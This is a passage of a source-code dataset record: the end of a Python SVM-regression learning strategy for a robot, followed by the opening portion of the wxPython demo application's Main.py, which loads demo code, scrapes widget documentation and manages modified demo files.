size_cache=10
# map each dimension of self.X to [0,1]
unif = phys2unif(self.X, self.ranges)
train_X = unif.T
train_y = self.y
train_X = train_X[:,-self.trainOnLast:]
train_y = train_y[-self.trainOnLast:]
sg('set_features', 'TRAIN', train_X)
#sg('set_kernel', 'GAUSSIAN', 'REAL', size_cache, self.width)
sg('set_kernel', 'LINEAR', 'REAL', size_cache)
sg('set_labels', 'TRAIN', train_y)
sg('new_regression', 'LIBSVR')
sg('svr_tube_epsilon', self.tube_epsilon)
sg('c', self.C)
sg('train_regression')
def predict(self, testPoints):
'''Predicts performance using previously learned model.
self.train() must be called before this!'''
if len(testPoints.shape) < 2:
testPoints = array([testPoints])
sg('set_features', 'TEST', phys2unif(testPoints,self.ranges).T)
predictions = sg('classify')
return predictions
def plot(self):
from matplotlib.pyplot import plot, show, savefig, xlabel, ylabel
plot(self.y)
xlabel('Iteration')
ylabel('Fitness (arbitrary units)')
savefig('svm_sim_results.eps')
savefig('svm_sim_results.png')
show()
def saveAndCleanup(self):
filename = 'svmstate_%s_%03d.pkl' % (self.randStr, self.iterations)
ff = open(filename, 'w')
pickle.dump(self, ff)
ff.close()
if self.iterations > 1:
lastIt = self.iterations-1
if (lastIt & (lastIt - 1)) != 0:
# if last one wasn't a power of two
filenameLast = 'svmstate_%s_%03d.pkl' % (self.randStr, lastIt)
os.remove(filenameLast)
def logHeader(self):
filename = 'svmstate_%s_000.pkl' % (self.randStr)
return '# SVMLearningStrategy saving itself as files like %s\n' % filename
#
# [JBY] The following is just code for testing the SVM/SVR learning
# capabilities.
#
def dummyObjective(X):
'''A Dummy objective that can be used to test learning strategies.
Intended to be used for vector X where each X is in or close to
[-1, 1].
'''
# Promote to float64 datatype
X = X * ones(len(X))
ret = 0.0
ret += sum(X)
ret += sum(sin(X/20))
return ret
def dummyObjectiveGauss(X, center, ranges):
'''A Dummy objective that can be used to test learning strategies.
fitness is 100 * GaussianPdf(mean, cov)
'''
covar = diag([((x[1]-x[0])*.2) ** 2 for x in ranges])
cinv = linalg.inv(covar)
return 100. * exp(-dot(dot((X-center), cinv), (X-center)))
def syntheticData(points = 10, dim = 3, fn = dummyObjective):
'''Generate the requested number of data points from a function.
Returns of the form:
[
(<label>, [(<feature>, <value>), ...]),
(<label>, [(<feature>, <value>), ...]),
...
]
'''
ret = []
for ii in range(points):
X = random.randn(dim)
y = fn(X)
ret.append( (y, [(ii+1, X[ii]) for ii in range(len(X))]) )
return ret
def syntheticData2(points = 10, dim = 3, fn = dummyObjective):
'''Generate the requested number of data points from a function.
Returns of the form:
X, y both numpy arrays
'''
ret = []
X = []
y = []
for ii in range(points):
X.append(random.randn(dim))
y.append(fn(X[-1]))
return array(X), array(y)
def main_svmlight():
# copied:
import svmlight
import pdb
training_data = syntheticData(30, 1)
test_data = syntheticData(30, 1)
#training_data = __import__('data').train0
#test_data = __import__('data').test0
print 'HERE 0'
print 'training_data is', training_data
print 'test_data is', test_data
# train a model based on the data
#pdb.set_trace()
print 'HERE 1'
model = svmlight.learn(training_data, type='regression', kernelType=2, verbosity=3)
print 'HERE 2'
# model data can be stored in the same format SVM-Light uses, for interoperability
# with the binaries.
svmlight.write_model(model, 'my_model.dat')
print 'HERE 3'
# classify the test data. this function returns a list of numbers, which represent
# the classifications.
#predictions = svmlight.classify(model, test_data)
pdb.set_trace()
predictions = svmlight.classify(model, training_data)
print 'HERE 4'
for p,example in zip(predictions, test_data):
print 'pred %.8f, actual %.8f' % (p, example[0])
def main_libsvr():
import pdb
train_X, train_y = syntheticData2(30, 1)
test_X, test_y = syntheticData2(20, 1)
train_X = train_X.T
test_X = test_X.T
print 'Trying LibSVR'
size_cache=10
width=2.1
C=1.2
epsilon=1e-5
tube_epsilon=1e-2
from sg import sg
sg('set_features', 'TRAIN', train_X)
sg('set_kernel', 'GAUSSIAN', 'REAL', size_cache, width)
sg('set_labels', 'TRAIN', train_y)
sg('new_regression', 'LIBSVR')
sg('svr_tube_epsilon', tube_epsilon)
sg('c', C)
sg('train_regression')
sg('set_features', 'TEST', test_X)
predictions = sg('classify')
for pred,act in zip(predictions, test_y):
print 'pred %.8f, actual %.8f' % (pred, act)
def main():
random.seed(11)
initialPoint = randUniformPoint(SineModel5.typicalRanges)
strategy = SVMLearningStrategy(initialPoint, ranges = SineModel5.typicalRanges)
center = array([100, 2, 0, 0, 0])
obj = lambda x: dummyObjectiveGauss(x, center, SineModel5.typicalRanges)
for ii in range(120):
print
print
current = strategy.getNext()
print ' %3d trying' % ii, prettyVec(current),
simDist = obj(current)
print simDist
strategy.updateResults(simDist)
strategy.plot()
if __name__ == '__main__':
main()
|
booi/aracna
|
RobotPi/SVMStrategy.py
|
Python
|
gpl-3.0
| 12,810
|
[
"Gaussian"
] |
6ce5c3025e514e6dd186addae7ad1d02b0230819101e0e5d7bc3da3791f21c5c
|
#!/bin/env python
#----------------------------------------------------------------------------
# Name: Main.py
# Purpose: Testing lots of stuff, controls, window types, etc.
#
# Author: Robin Dunn
#
# Created: A long time ago, in a galaxy far, far away...
# Copyright: (c) 1999-2017 by Total Control Software
# Licence: wxWindows license
# Tags: phoenix-port, py3-port
#----------------------------------------------------------------------------
# FIXME List:
# * Problems with flickering related to ERASE_BACKGROUND
# and the splitters. Might be a problem with this 2.5 beta...?
# UPDATE: can't see on 2.5.2 GTK - maybe just a faster machine :)
# * Demo Code menu?
# * Annoying switching between tabs and resulting flicker
# how to replace a page in the notebook without deleting/adding?
# Where is SetPage!? tried freeze...tried reparent of dummy panel....
# AG: It looks like this issue is fixed by Freeze()ing and Thaw()ing the
# main frame and not the notebook
# TODO List:
# * UI design more professional (is the new version more professional?)
# * save file positions (new field in demoModules) (@ LoadDemoSource)
# * Update main overview
# * Why don't we move _treeList into a separate module
# =====================
# = EXTERNAL Packages =
# =====================
# In order to let a package (like AGW) be included in the wxPython demo,
# the package owner should create a sub-directory of the wxPython demo folder
# in which all the package's demos should live. In addition, the sub-folder
# should contain a Python file called __demo__.py which, when imported, should
# contain the following methods:
#
# * GetDemoBitmap: returns the bitmap to be used in the wxPython demo tree control
# in a PyEmbeddedImage format;
# * GetRecentAdditions: returns a list of demos which will be displayed under the
# "Recent Additions/Updates" tree item. This list should be a subset (or the full
# set) of the package's demos;
# * GetDemos: returns a tuple. The first item of the tuple is the package's name
# as will be displayed in the wxPython demo tree, right after the "Custom Controls"
# item. The second element of the tuple is the list of demos for the external package.
# * GetOverview: returns a wx.html-ready representation of the package's documentation.
#
# Please see the __demo__.py file in the demo/agw/ folder for an example.
# Last updated: Andrea Gavana, 20 Oct 2008, 18.00 GMT
import sys, os, time, traceback
import re
import shutil
from threading import Thread
from distutils.version import LooseVersion
import wx
import wx.adv
import wx.lib.agw.aui as aui
import wx.html
from wx.lib.msgpanel import MessagePanel
from wx.adv import TaskBarIcon as TaskBarIcon
from wx.adv import SplashScreen as SplashScreen
import wx.lib.mixins.inspection
import six
from six import exec_, BytesIO
from six.moves import cPickle
from six.moves import urllib
import version
# We won't import the images module yet, but we'll assign it to this
# global when we do.
images = None
# For debugging
##wx.Trap();
##print("wx.VERSION_STRING = %s (%s)" % (wx.VERSION_STRING, wx.USE_UNICODE and 'unicode' or 'ansi'))
##print("pid:", os.getpid())
##raw_input("Press Enter...")
#---------------------------------------------------------------------------
USE_CUSTOMTREECTRL = False
DEFAULT_PERSPECTIVE = "Default Perspective"
#---------------------------------------------------------------------------
# get images and demo list
from demodata import _demoPngs, _treeList
#---------------------------------------------------------------------------
_styleTable = '<h3>Window %s</h3>\n' \
'<p>This class supports the following window %s:\n' \
'<p><table bgcolor=\"#ffffff\" border cols=1>'
_eventTable = '<h3>Events</h3>\n' \
'<p>Events emitted by this class:\n' \
'<p><table bgcolor=\"#ffffff\" border cols=1>'
_appearanceTable = '<h3>Appearance</h3>\n' \
'<p>Control appearance on various platform:\n' \
'<p><table bgcolor=\"#ffffff\" cellspacing=20>'
_styleHeaders = ["Style Name", "Description"]
_eventHeaders = ["Event Name", "Description"]
_headerTable = '<td><b>%s</b></td>'
_styleTag = '<td><tt>%s</tt></td>'
_eventTag = '<td><i>%s</i></td>'
_hexValues = '<td><font color="%s"> %s </font></td>'
_description = '<td>%s</td>'
_imageTag = '<td align=center valign=middle><a href="%s"><img src="%s" alt="%s"></a></td>'
_platformTag = '<td align=center><b>%s</b></td>'
_trunkURL = "http://docs.wxwidgets.org/trunk/"
_docsURL = _trunkURL + "classwx%s.html"
_platformNames = ["wxMSW", "wxGTK", "wxMac"]
_importList = ["wx.aui", "wx.calendar", "wx.html", "wx.media", "wx.wizard",
"wx.combo", "wx.animate", "wx.gizmos", "wx.glcanvas", "wx.grid",
"wx.richtext", "wx.stc"]
_dirWX = dir(wx)
for mod in _importList:
try:
module = __import__(mod)
except ImportError:
continue
#---------------------------------------------------------------------------
def ReplaceCapitals(string):
"""
Replaces the capital letter in a string with an underscore plus the
corresponding lowercase character.
**Parameters:**
* `string`: the string to be analyzed.
"""
newString = ""
for char in string:
if char.isupper():
newString += "_%s"%char.lower()
else:
newString += char
return newString
def RemoveHTMLTags(data):
"""
Removes all the HTML tags from a string.
**Parameters:**
* `data`: the string to be analyzed.
"""
p = re.compile(r'<[^<]*?>')
return p.sub('', data)
def FormatDocs(keyword, values, num):
names = list(values.keys())
names.sort()
headers = (num == 2 and [_eventHeaders] or [_styleHeaders])[0]
table = (num == 2 and [_eventTable] or [_styleTable])[0]
if num == 3:
text = "<br>" + table%(keyword.lower(), keyword.lower()) + "\n<tr>\n"
else:
text = "<br>" + table
for indx in range(2):
text += _headerTable%headers[indx]
text += "\n</tr>\n"
for name in names:
text += "<tr>\n"
description = values[name].strip()
pythonValue = name.replace("wx", "wx.")
if num == 3:
colour = "#ff0000"
value = "Unavailable"
cutValue = pythonValue[3:]
if cutValue in _dirWX:
try:
val = eval(pythonValue)
value = "%s"%hex(val)
colour = "#0000ff"
except AttributeError:
value = "Unavailable"
else:
for packages in _importList:
if cutValue in dir(eval(packages)):
val = eval("%s.%s"%(packages, cutValue))
value = "%s"%hex(val)
colour = "#0000ff"
pythonValue = "%s.%s"%(packages, cutValue)
break
text += _styleTag%pythonValue + "\n"
else:
text += _eventTag%pythonValue + "\n"
text += _description%FormatDescription(description) + "\n"
text += "</tr>\n"
text += "\n</table>\n\n<p>"
return text
def FormatDescription(description):
"""
Formats a wxWidgets C++ description in a more wxPython-based way.
**Parameters:**
* `description`: the string description to be formatted.
"""
description = description.replace("wx", "wx.")
description = description.replace("EVT_COMMAND", "wxEVT_COMMAND")
description = description.replace("wx.Widgets", "wxWidgets")
return description
def FormatImages(appearance):
text = "<p><br>" + _appearanceTable
for indx in range(2):
text += "\n<tr>\n"
for key in _platformNames:
if indx == 0:
src = appearance[key]
alt = key + "Appearance"
text += _imageTag%(src, src, alt)
else:
text += _platformTag%key
text += "</tr>\n"
text += "\n</table>\n\n<p>"
return text
def FindWindowStyles(text, originalText, widgetName):
"""
Finds the windows styles and events in the input text.
**Parameters:**
* `text`: the wxWidgets C++ docs for a particular widget/event, stripped
of all HTML tags;
* `originalText`: the wxWidgets C++ docs for a particular widget/event, with
all HTML tags.
"""
winStyles, winEvents, winExtra, winAppearance = {}, {}, {}, {}
inStyle = inExtra = inEvent = False
for line in text:
if "following styles:" in line:
inStyle = True
continue
elif "Event macros" in line:
inEvent = True
continue
if "following extra styles:" in line:
inExtra = True
continue
if "Appearance:" in line:
winAppearance = FindImages(originalText, widgetName)
continue
elif not line.strip():
inStyle = inEvent = inExtra = False
continue
if inStyle:
start = line.index(':')
windowStyle = line[0:start]
styleDescription = line[start+1:]
winStyles[windowStyle] = styleDescription
elif inEvent:
start = line.index(':')
eventName = line[0:start]
eventDescription = line[start+1:]
winEvents[eventName] = eventDescription
elif inExtra:
start = line.index(':')
styleName = line[0:start]
styleDescription = line[start+1:]
winExtra[styleName] = styleDescription
return winStyles, winEvents, winExtra, winAppearance
def FindImages(text, widgetName):
"""
When the wxWidgets docs contain athe control appearance (a screenshot of the
control), this method will try and download the images.
**Parameters:**
* `text`: the wxWidgets C++ docs for a particular widget/event, with
all HTML tags.
"""
winAppearance = {}
start = text.find("class='appearance'")
if start < 0:
return winAppearance
imagesDir = GetDocImagesDir()
end = start + text.find("</table>")
text = text[start:end]
split = text.split()
for indx, items in enumerate(split):
if "src=" in items:
possibleImage = items.replace("src=", "").strip()
possibleImage = possibleImage.replace('"', "")
f = urllib.request.urlopen(_trunkURL + possibleImage)
stream = f.read()
elif "alt=" in items:
plat = items.replace("alt=", "").replace("'", "").strip()
path = os.path.join(imagesDir, plat, widgetName + ".png")
if not os.path.isfile(path):
image = wx.ImageFromStream(BytesIO(stream))
image.SaveFile(path, wx.BITMAP_TYPE_PNG)
winAppearance[plat] = path
return winAppearance
#---------------------------------------------------------------------------
# Set up a thread that will scan the wxWidgets docs for window styles,
# events and widgets screenshots
class InternetThread(Thread):
""" Worker thread class to attempt connection to the internet. """
def __init__(self, notifyWindow, selectedClass):
Thread.__init__(self)
self.notifyWindow = notifyWindow
self.selectedClass = selectedClass
self.keepRunning = True
self.setDaemon(True)
self.start()
def run(self):
""" Run the worker thread. """
# This is the code executing in the new thread. Simulation of
# a long process as a simple urllib call
try:
url = _docsURL % ReplaceCapitals(self.selectedClass)
fid = urllib.request.urlopen(url)
if six.PY2:
originalText = fid.read()
else:
originalText = fid.read().decode("utf-8")
text = RemoveHTMLTags(originalText).split("\n")
data = FindWindowStyles(text, originalText, self.selectedClass)
if not self.keepRunning:
return
wx.CallAfter(self.notifyWindow.LoadDocumentation, data)
except (IOError, urllib.error.HTTPError):
# Unable to get to the internet
t, v = sys.exc_info()[:2]
message = traceback.format_exception_only(t, v)
wx.CallAfter(self.notifyWindow.StopDownload, message)
except:
# Some other strange error...
t, v = sys.exc_info()[:2]
message = traceback.format_exception_only(t, v)
wx.CallAfter(self.notifyWindow.StopDownload, message)
#---------------------------------------------------------------------------
# Show how to derive a custom wxLog class
class MyLog(wx.Log):
def __init__(self, textCtrl, logTime=0):
wx.Log.__init__(self)
self.tc = textCtrl
self.logTime = logTime
def DoLogText(self, message):
if self.tc:
self.tc.AppendText(message + '\n')
#---------------------------------------------------------------------------
# A class to be used to display source code in the demo. Try using the
# wxSTC in the StyledTextCtrl_2 sample first, fall back to wxTextCtrl
# if there is an error, such as the stc module not being present.
#
try:
##raise ImportError # for testing the alternate implementation
from wx import stc
from StyledTextCtrl_2 import PythonSTC
class DemoCodeEditor(PythonSTC):
def __init__(self, parent, style=wx.BORDER_NONE):
PythonSTC.__init__(self, parent, -1, style=style)
self.SetUpEditor()
# Some methods to make it compatible with how the wxTextCtrl is used
def SetValue(self, value):
# if wx.USE_UNICODE:
# value = value.decode('iso8859_1')
val = self.GetReadOnly()
self.SetReadOnly(False)
self.SetText(value)
self.EmptyUndoBuffer()
self.SetSavePoint()
self.SetReadOnly(val)
def SetEditable(self, val):
self.SetReadOnly(not val)
def IsModified(self):
return self.GetModify()
def Clear(self):
self.ClearAll()
def SetInsertionPoint(self, pos):
self.SetCurrentPos(pos)
self.SetAnchor(pos)
def ShowPosition(self, pos):
line = self.LineFromPosition(pos)
#self.EnsureVisible(line)
self.GotoLine(line)
def GetLastPosition(self):
return self.GetLength()
def GetPositionFromLine(self, line):
return self.PositionFromLine(line)
def GetRange(self, start, end):
return self.GetTextRange(start, end)
def GetSelection(self):
return self.GetAnchor(), self.GetCurrentPos()
def SetSelection(self, start, end):
self.SetSelectionStart(start)
self.SetSelectionEnd(end)
def SelectLine(self, line):
start = self.PositionFromLine(line)
end = self.GetLineEndPosition(line)
self.SetSelection(start, end)
def SetUpEditor(self):
"""
This method carries out the work of setting up the demo editor.
It's seperate so as not to clutter up the init code.
"""
import keyword
self.SetLexer(stc.STC_LEX_PYTHON)
self.SetKeyWords(0, " ".join(keyword.kwlist))
# Enable folding
self.SetProperty("fold", "1" )
# Highlight tab/space mixing (shouldn't be any)
self.SetProperty("tab.timmy.whinge.level", "1")
# Set left and right margins
self.SetMargins(2,2)
# Set up the numbers in the margin for margin #1
self.SetMarginType(1, wx.stc.STC_MARGIN_NUMBER)
# Reasonable value for, say, 4-5 digits using a mono font (40 pix)
self.SetMarginWidth(1, 40)
# Indentation and tab stuff
self.SetIndent(4) # Proscribed indent size for wx
self.SetIndentationGuides(True) # Show indent guides
self.SetBackSpaceUnIndents(True)# Backspace unindents rather than delete 1 space
self.SetTabIndents(True) # Tab key indents
self.SetTabWidth(4) # Proscribed tab size for wx
self.SetUseTabs(False) # Use spaces rather than tabs, or
# TabTimmy will complain!
# White space
self.SetViewWhiteSpace(False) # Don't view white space
# EOL: Since we are loading/saving ourselves, and the
# strings will always have \n's in them, set the STC to
# edit them that way.
self.SetEOLMode(wx.stc.STC_EOL_LF)
self.SetViewEOL(False)
# No right-edge mode indicator
self.SetEdgeMode(stc.STC_EDGE_NONE)
# Setup a margin to hold fold markers
self.SetMarginType(2, stc.STC_MARGIN_SYMBOL)
self.SetMarginMask(2, stc.STC_MASK_FOLDERS)
self.SetMarginSensitive(2, True)
self.SetMarginWidth(2, 12)
# and now set up the fold markers
self.MarkerDefine(stc.STC_MARKNUM_FOLDEREND, stc.STC_MARK_BOXPLUSCONNECTED, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDEROPENMID, stc.STC_MARK_BOXMINUSCONNECTED, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDERMIDTAIL, stc.STC_MARK_TCORNER, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDERTAIL, stc.STC_MARK_LCORNER, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDERSUB, stc.STC_MARK_VLINE, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDER, stc.STC_MARK_BOXPLUS, "white", "black")
self.MarkerDefine(stc.STC_MARKNUM_FOLDEROPEN, stc.STC_MARK_BOXMINUS, "white", "black")
# Global default style
if wx.Platform == '__WXMSW__':
self.StyleSetSpec(stc.STC_STYLE_DEFAULT,
'fore:#000000,back:#FFFFFF,face:Courier New')
elif wx.Platform == '__WXMAC__':
# TODO: if this looks fine on Linux too, remove the Mac-specific case
# and use this whenever OS != MSW.
self.StyleSetSpec(stc.STC_STYLE_DEFAULT,
'fore:#000000,back:#FFFFFF,face:Monaco')
else:
defsize = wx.SystemSettings.GetFont(wx.SYS_ANSI_FIXED_FONT).GetPointSize()
self.StyleSetSpec(stc.STC_STYLE_DEFAULT,
'fore:#000000,back:#FFFFFF,face:Courier,size:%d'%defsize)
# Clear styles and revert to default.
self.StyleClearAll()
# Following style specs only indicate differences from default.
# The rest remains unchanged.
# Line numbers in margin
self.StyleSetSpec(wx.stc.STC_STYLE_LINENUMBER,'fore:#000000,back:#99A9C2')
# Highlighted brace
self.StyleSetSpec(wx.stc.STC_STYLE_BRACELIGHT,'fore:#00009D,back:#FFFF00')
# Unmatched brace
self.StyleSetSpec(wx.stc.STC_STYLE_BRACEBAD,'fore:#00009D,back:#FF0000')
# Indentation guide
self.StyleSetSpec(wx.stc.STC_STYLE_INDENTGUIDE, "fore:#CDCDCD")
# Python styles
self.StyleSetSpec(wx.stc.STC_P_DEFAULT, 'fore:#000000')
# Comments
self.StyleSetSpec(wx.stc.STC_P_COMMENTLINE, 'fore:#008000,back:#F0FFF0')
self.StyleSetSpec(wx.stc.STC_P_COMMENTBLOCK, 'fore:#008000,back:#F0FFF0')
# Numbers
self.StyleSetSpec(wx.stc.STC_P_NUMBER, 'fore:#008080')
# Strings and characters
self.StyleSetSpec(wx.stc.STC_P_STRING, 'fore:#800080')
self.StyleSetSpec(wx.stc.STC_P_CHARACTER, 'fore:#800080')
# Keywords
self.StyleSetSpec(wx.stc.STC_P_WORD, 'fore:#000080,bold')
# Triple quotes
self.StyleSetSpec(wx.stc.STC_P_TRIPLE, 'fore:#800080,back:#FFFFEA')
self.StyleSetSpec(wx.stc.STC_P_TRIPLEDOUBLE, 'fore:#800080,back:#FFFFEA')
# Class names
self.StyleSetSpec(wx.stc.STC_P_CLASSNAME, 'fore:#0000FF,bold')
# Function names
self.StyleSetSpec(wx.stc.STC_P_DEFNAME, 'fore:#008080,bold')
# Operators
self.StyleSetSpec(wx.stc.STC_P_OPERATOR, 'fore:#800000,bold')
# Identifiers. I leave this as not bold because everything seems
# to be an identifier if it doesn't match the above criterae
self.StyleSetSpec(wx.stc.STC_P_IDENTIFIER, 'fore:#000000')
# Caret color
self.SetCaretForeground("BLUE")
# Selection background
self.SetSelBackground(1, '#66CCFF')
self.SetSelBackground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))
self.SetSelForeground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT))
def RegisterModifiedEvent(self, eventHandler):
self.Bind(wx.stc.EVT_STC_CHANGE, eventHandler)
except ImportError:
class DemoCodeEditor(wx.TextCtrl):
def __init__(self, parent):
wx.TextCtrl.__init__(self, parent, -1, style =
wx.TE_MULTILINE | wx.HSCROLL | wx.TE_RICH2 | wx.TE_NOHIDESEL)
def RegisterModifiedEvent(self, eventHandler):
self.Bind(wx.EVT_TEXT, eventHandler)
def SetReadOnly(self, flag):
self.SetEditable(not flag)
# NOTE: STC already has this method
def GetText(self):
return self.GetValue()
def GetPositionFromLine(self, line):
return self.XYToPosition(0,line)
def GotoLine(self, line):
pos = self.GetPositionFromLine(line)
self.SetInsertionPoint(pos)
self.ShowPosition(pos)
def SelectLine(self, line):
start = self.GetPositionFromLine(line)
end = start + self.GetLineLength(line)
self.SetSelection(start, end)
#---------------------------------------------------------------------------
# Constants for module versions
modOriginal = 0
modModified = 1
modDefault = modOriginal
#---------------------------------------------------------------------------
class DemoCodePanel(wx.Panel):
"""Panel for the 'Demo Code' tab"""
def __init__(self, parent, mainFrame):
wx.Panel.__init__(self, parent, size=(1,1))
if 'wxMSW' in wx.PlatformInfo:
self.Hide()
self.mainFrame = mainFrame
self.editor = DemoCodeEditor(self)
self.editor.RegisterModifiedEvent(self.OnCodeModified)
self.btnSave = wx.Button(self, -1, "Save Changes")
self.btnRestore = wx.Button(self, -1, "Delete Modified")
self.btnSave.Enable(False)
self.btnSave.Bind(wx.EVT_BUTTON, self.OnSave)
self.btnRestore.Bind(wx.EVT_BUTTON, self.OnRestore)
self.radioButtons = { modOriginal: wx.RadioButton(self, -1, "Original", style = wx.RB_GROUP),
modModified: wx.RadioButton(self, -1, "Modified") }
self.controlBox = wx.BoxSizer(wx.HORIZONTAL)
self.controlBox.Add(wx.StaticText(self, -1, "Active Version:"), 0,
wx.RIGHT | wx.LEFT | wx.ALIGN_CENTER_VERTICAL, 5)
for modID, radioButton in self.radioButtons.items():
self.controlBox.Add(radioButton, 0, wx.EXPAND | wx.RIGHT, 5)
radioButton.modID = modID # makes it easier for the event handler
radioButton.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton)
self.controlBox.Add(self.btnSave, 0, wx.RIGHT, 5)
self.controlBox.Add(self.btnRestore, 0)
self.box = wx.BoxSizer(wx.VERTICAL)
self.box.Add(self.controlBox, 0, wx.EXPAND)
self.box.Add(wx.StaticLine(self), 0, wx.EXPAND)
self.box.Add(self.editor, 1, wx.EXPAND)
self.box.Fit(self)
self.SetSizer(self.box)
# Loads a demo from a DemoModules object
def LoadDemo(self, demoModules):
self.demoModules = demoModules
if (modDefault == modModified) and demoModules.Exists(modModified):
demoModules.SetActive(modModified)
else:
demoModules.SetActive(modOriginal)
self.radioButtons[demoModules.GetActiveID()].Enable(True)
self.ActiveModuleChanged()
def ActiveModuleChanged(self):
self.LoadDemoSource(self.demoModules.GetSource())
self.UpdateControlState()
self.mainFrame.pnl.Freeze()
self.ReloadDemo()
self.mainFrame.pnl.Thaw()
def LoadDemoSource(self, source):
self.editor.Clear()
self.editor.SetValue(source)
self.JumpToLine(0)
self.btnSave.Enable(False)
def JumpToLine(self, line, highlight=False):
self.editor.GotoLine(line)
self.editor.SetFocus()
if highlight:
self.editor.SelectLine(line)
def UpdateControlState(self):
active = self.demoModules.GetActiveID()
# Update the radio/restore buttons
for moduleID in self.radioButtons:
btn = self.radioButtons[moduleID]
if moduleID == active:
btn.SetValue(True)
else:
btn.SetValue(False)
if self.demoModules.Exists(moduleID):
btn.Enable(True)
if moduleID == modModified:
self.btnRestore.Enable(True)
else:
btn.Enable(False)
if moduleID == modModified:
self.btnRestore.Enable(False)
def OnRadioButton(self, event):
radioSelected = event.GetEventObject()
modSelected = radioSelected.modID
if modSelected != self.demoModules.GetActiveID():
busy = wx.BusyInfo("Reloading demo module...")
self.demoModules.SetActive(modSelected)
self.ActiveModuleChanged()
def ReloadDemo(self):
if self.demoModules.name != __name__:
self.mainFrame.RunModule()
def OnCodeModified(self, event):
self.btnSave.Enable(self.editor.IsModified())
def OnSave(self, event):
if self.demoModules.Exists(modModified):
if self.demoModules.GetActiveID() == modOriginal:
overwriteMsg = "You are about to overwrite an already existing modified copy\n" + \
"Do you want to continue?"
dlg = wx.MessageDialog(self, overwriteMsg, "wxPython Demo",
wx.YES_NO | wx.NO_DEFAULT| wx.ICON_EXCLAMATION)
result = dlg.ShowModal()
if result == wx.ID_NO:
return
dlg.Destroy()
self.demoModules.SetActive(modModified)
modifiedFilename = GetModifiedFilename(self.demoModules.name)
# Create the demo directory if one doesn't already exist
if not os.path.exists(GetModifiedDirectory()):
try:
os.makedirs(GetModifiedDirectory())
if not os.path.exists(GetModifiedDirectory()):
wx.LogMessage("BUG: Created demo directory but it still doesn't exist")
raise AssertionError
except:
wx.LogMessage("Error creating demo directory: %s" % GetModifiedDirectory())
return
else:
wx.LogMessage("Created directory for modified demos: %s" % GetModifiedDirectory())
# Save
f = open(modifiedFilename, "wt")
source = self.editor.GetText()
try:
f.write(source)
finally:
f.close()
busy = wx.BusyInfo("Reloading demo module...")
self.demoModules.LoadFromFile(modModified, modifiedFilename)
self.ActiveModuleChanged()
self.mainFrame.SetTreeModified(True)
def OnRestore(self, event): # Handles the "Delete Modified" button
modifiedFilename = GetModifiedFilename(self.demoModules.name)
self.demoModules.Delete(modModified)
os.unlink(modifiedFilename) # Delete the modified copy
busy = wx.BusyInfo("Reloading demo module...")
self.ActiveModuleChanged()
self.mainFrame.SetTreeModified(False)
#---------------------------------------------------------------------------
def opj(path):
"""Convert paths to the platform-specific separator"""
st = os.path.join(*tuple(path.split('/')))
# HACK: on Linux, a leading / gets lost...
if path.startswith('/'):
st = '/' + st
return st
def GetDataDir():
"""
Return the standard location on this platform for application data
"""
sp = wx.StandardPaths.Get()
return sp.GetUserDataDir()
def GetModifiedDirectory():
"""
Returns the directory where modified versions of the demo files
are stored
"""
return os.path.join(GetDataDir(), "modified")
def GetModifiedFilename(name):
"""
Returns the filename of the modified version of the specified demo
"""
if not name.endswith(".py"):
name = name + ".py"
return os.path.join(GetModifiedDirectory(), name)
def GetOriginalFilename(name):
"""
Returns the filename of the original version of the specified demo
"""
if not name.endswith(".py"):
name = name + ".py"
if os.path.isfile(name):
return name
originalDir = os.getcwd()
listDir = os.listdir(originalDir)
# Loop over the content of the demo directory
for item in listDir:
if not os.path.isdir(item):
# Not a directory, continue
continue
dirFile = os.listdir(item)
# See if a file called "name" is there
if name in dirFile:
return os.path.join(item, name)
# We must return a string...
return ""
def DoesModifiedExist(name):
"""Returns whether the specified demo has a modified copy"""
if os.path.exists(GetModifiedFilename(name)):
return True
else:
return False
def GetConfig():
if not os.path.exists(GetDataDir()):
os.makedirs(GetDataDir())
config = wx.FileConfig(
localFilename=os.path.join(GetDataDir(), "options"))
return config
def MakeDocDirs():
docDir = os.path.join(GetDataDir(), "docs")
if not os.path.exists(docDir):
os.makedirs(docDir)
for plat in _platformNames:
imageDir = os.path.join(docDir, "images", plat)
if not os.path.exists(imageDir):
os.makedirs(imageDir)
def GetDocFile():
docFile = os.path.join(GetDataDir(), "docs", "TrunkDocs.pkl")
return docFile
def GetDocImagesDir():
MakeDocDirs()
return os.path.join(GetDataDir(), "docs", "images")
def SearchDemo(name, keyword):
""" Returns whether a demo contains the search keyword or not. """
fid = open(GetOriginalFilename(name), "rt")
fullText = fid.read()
fid.close()
fullText = fullText.decode("iso-8859-1")
if fullText.find(keyword) >= 0:
return True
return False
def HuntExternalDemos():
"""
Searches for external demos (i.e. packages like AGW) in the wxPython
demo sub-directories. In order to be found, these external packages
must have a __demo__.py file in their directory.
"""
externalDemos = {}
originalDir = os.getcwd()
listDir = os.listdir(originalDir)
# Loop over the content of the demo directory
for item in listDir:
if not os.path.isdir(item):
# Not a directory, continue
continue
dirFile = os.listdir(item)
# See if a __demo__.py file is there
if "__demo__.py" in dirFile:
# Extend sys.path and import the external demos
sys.path.append(item)
externalDemos[item] = __import__("__demo__")
if not externalDemos:
# Nothing to import...
return {}
# Modify the tree items and icons
index = 0
for category, demos in _treeList:
# We put the external packages right before the
# More Windows/Controls item
if category == "More Windows/Controls":
break
index += 1
# Sort and reverse the external demos keys so that they
# come back in alphabetical order
keys = list(externalDemos.keys())
keys.sort()
keys.reverse()
# Loop over all external packages
for extern in keys:
package = externalDemos[extern]
# Insert a new package in the _treeList of demos
_treeList.insert(index, package.GetDemos())
# Get the recent additions for this package
_treeList[0][1].extend(package.GetRecentAdditions())
# Extend the demo bitmaps and the catalog
_demoPngs.insert(index+1, extern)
images.catalog[extern] = package.GetDemoBitmap()
# That's all folks...
return externalDemos
def LookForExternals(externalDemos, demoName):
"""
Checks if a demo name is in any of the external packages (like AGW) or
if the user clicked on one of the external packages parent items in the
tree, in which case it returns the html overview for the package.
"""
pkg = overview = None
# Loop over all the external demos
for key, package in externalDemos.items():
# Get the tree item name for the package and its demos
treeName, treeDemos = package.GetDemos()
# Get the overview for the package
treeOverview = package.GetOverview()
